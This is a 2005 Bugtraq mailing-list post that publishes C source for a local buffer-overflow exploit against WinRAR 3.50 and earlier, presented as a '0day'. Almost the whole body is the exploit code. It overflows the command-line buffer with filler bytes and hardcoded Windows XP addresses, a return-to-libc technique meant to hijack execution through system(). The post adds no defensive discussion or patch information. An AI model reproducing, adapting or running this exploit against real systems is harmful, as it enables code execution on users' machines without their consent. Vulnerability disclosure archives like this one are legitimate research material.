winrar 3.50 Exploit

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: winrar 3.50 Exploit
From: edward11@xxxxxxxxxxxxxxxx
Date: 15 Oct 2005 21:30:56 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

/*

local exploit for winrar <= 3.50 ENG version


bug is 0day :)

i'm used ret-2-func technique.

*/

#include <stdio.h>
#include <string.h>
#include <windows.h>

int main ( int argc, char *argv[] )
{
   long sys_addr  = 0x77C18044; // winxp sp0 targets...
   long exit_addr = 0x77C27ADC;
   long cmd_addr  = 0x77C01335;

   char buf[3000];
   char cmd[3000];
   
   if ( argc < 2 )
   {
   printf("\n * 0xLeTzDanCe - WinRAR <= 3.50 local exploit ENG version  *\n * * 
usage: 0xletzdance.exe <path_to_RAR>\n\n");
   exit(0);
   }

   memset(buf, 0x00, 3000);
   memset(cmd, 0x00, 3000);

   memset(buf, 0x55, 516);

   *(long*)&buf[strlen(buf)]  = sys_addr;
   *(long *)&buf[strlen(buf)] = exit_addr;
   *(long *)&buf[strlen(buf)] = cmd_addr;

   sprintf(cmd, "%s %s", argv[1], buf);
   system(cmd);

}

Prev by Date: Re: Aenovo Multiple Vulnerabilities (Patch)
Next by Date: [USN-210-1] netpbm vulnerability
Previous by thread: Re: Aenovo Multiple Vulnerabilities (Patch)
Next by thread: [USN-210-1] netpbm vulnerability
Index(es):
- Date
- Thread